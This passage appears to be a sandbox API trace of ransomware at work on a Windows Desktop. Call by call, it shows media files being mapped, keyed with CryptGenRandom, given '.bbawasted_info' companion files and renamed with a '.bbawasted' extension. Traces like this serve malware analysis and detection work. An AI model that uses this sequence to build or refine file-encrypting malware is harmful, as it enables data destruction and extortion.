(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5fD7Sq2zCyeh.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5fd7sq2zcyeh.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.304] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.304] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x3d32 [0069.304] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d32) returned 0x570000 [0069.304] CloseHandle (hObject=0xf8) returned 1 [0069.306] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.307] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf938 | out: pbBuffer=0x5bf938) returned 1 [0069.307] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.307] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.308] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.308] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.316] SetEndOfFile (hFile=0x120) returned 1 [0069.391] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.391] CloseHandle (hObject=0x120) returned 1 [0069.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfbd0 | out: hHeap=0x580000) returned 1 [0069.393] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5c8560) returned 1 [0069.393] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.393] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cpXdwPiRYW2XgC.avi") returned 60 [0069.393] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x282) returned 0x5c77b0 [0069.393] lstrcpyW (in: lpString1=0x5c7828, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.394] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.394] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5c8560) returned 1 [0069.394] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.394] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cpXdwPiRYW2XgC.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpxdwpiryw2xgc.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.395] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.396] SetEndOfFile (hFile=0x120) returned 1 [0069.397] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.397] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.397] lstrcpyW (in: lpString1=0x5c7828, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cpXdwPiRYW2XgC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpxdwpiryw2xgc.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cpXdwPiRYW2XgC.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpxdwpiryw2xgc.avi.bbawasted")) returned 1 [0069.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cpXdwPiRYW2XgC.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpxdwpiryw2xgc.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0069.398] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0069.398] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x130e2 [0069.398] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x130e2) returned 0xfe0000 [0069.398] CloseHandle (hObject=0x11c) returned 1 [0069.402] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5c8560) returned 1 [0069.403] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.403] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.403] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5c8560) returned 1 [0069.404] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.404] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.412] SetEndOfFile (hFile=0x120) returned 1 [0069.415] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.415] CloseHandle (hObject=0x120) returned 1 [0069.416] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.416] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bff18 | out: hHeap=0x580000) returned 1 [0069.416] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5c8560) returned 1 [0069.417] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.417] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E4SlThS0btqJ.mkv") returned 58 [0069.417] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5c77b0 [0069.417] lstrcpyW (in: lpString1=0x5c7824, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.417] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.417] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5c8560) returned 1 [0069.418] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.418] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E4SlThS0btqJ.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e4slths0btqj.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.418] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.419] SetEndOfFile (hFile=0x120) returned 1 [0069.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.420] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.420] lstrcpyW (in: lpString1=0x5c7824, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E4SlThS0btqJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e4slths0btqj.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E4SlThS0btqJ.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e4slths0btqj.mkv.bbawasted")) returned 1 [0069.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E4SlThS0btqJ.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e4slths0btqj.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0069.421] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0069.421] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x15467 [0069.421] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15467) returned 0xfe0000 [0069.421] CloseHandle (hObject=0x100) returned 1 [0069.425] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5c8560) returned 1 [0069.426] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.426] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.426] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5c8560) returned 1 [0069.427] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.427] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.436] SetEndOfFile (hFile=0x120) returned 1 [0069.517] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.517] CloseHandle (hObject=0x120) returned 1 [0069.518] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.518] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfff0 | out: hHeap=0x580000) returned 1 [0069.519] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.519] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.519] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.519] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JRfMQttk 6n_63Totl.avi") returned 64 [0069.519] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5c77b0 [0069.519] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.519] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.520] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.520] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.520] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JRfMQttk 6n_63Totl.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrfmqttk 6n_63totl.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.523] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.524] SetEndOfFile (hFile=0x120) returned 1 [0069.525] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.525] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.525] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JRfMQttk 6n_63Totl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrfmqttk 6n_63totl.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JRfMQttk 6n_63Totl.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrfmqttk 6n_63totl.avi.bbawasted")) returned 1 [0069.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JRfMQttk 6n_63Totl.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrfmqttk 6n_63totl.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.526] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.526] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x6795 [0069.526] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6795) returned 0x570000 [0069.527] CloseHandle (hObject=0xfc) returned 1 [0069.529] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.530] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.530] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.530] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.530] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.530] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.541] SetEndOfFile (hFile=0x120) returned 1 [0069.543] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.543] CloseHandle (hObject=0x120) returned 1 [0069.545] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.545] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c56e8 | out: hHeap=0x580000) returned 1 [0069.545] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.546] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.546] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.546] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MEigkuDK8o.mp3") returned 56 [0069.546] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5c77b0 [0069.546] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.546] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.546] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.547] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.547] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MEigkuDK8o.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\meigkudk8o.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.554] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.555] SetEndOfFile (hFile=0x120) returned 1 [0069.556] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.556] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.556] lstrcpyW (in: lpString1=0x5c7820, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MEigkuDK8o.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\meigkudk8o.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MEigkuDK8o.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\meigkudk8o.mp3.bbawasted")) returned 1 [0069.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MEigkuDK8o.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\meigkudk8o.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.557] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.557] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x10b17 [0069.557] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b17) returned 0xfe0000 [0069.557] CloseHandle (hObject=0xf8) returned 1 [0069.561] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.561] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.561] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.561] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.562] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.562] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.570] SetEndOfFile (hFile=0x120) returned 1 [0069.575] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.575] CloseHandle (hObject=0x120) returned 1 [0069.576] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.576] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c57c8 | out: hHeap=0x580000) returned 1 [0069.577] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.577] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.577] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.577] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N09Q7cEZG.gif") returned 55 [0069.577] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5c77b0 [0069.578] lstrcpyW (in: lpString1=0x5c781e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.578] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.578] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.578] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.578] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N09Q7cEZG.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n09q7cezg.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.580] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.581] SetEndOfFile (hFile=0x120) returned 1 [0069.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.581] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.581] lstrcpyW (in: lpString1=0x5c781e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N09Q7cEZG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n09q7cezg.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N09Q7cEZG.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n09q7cezg.gif.bbawasted")) returned 1 [0069.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N09Q7cEZG.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n09q7cezg.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.583] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.583] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xb6bb [0069.583] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb6bb) returned 0x570000 [0069.583] CloseHandle (hObject=0xfc) returned 1 [0069.586] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.587] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.587] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.587] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, 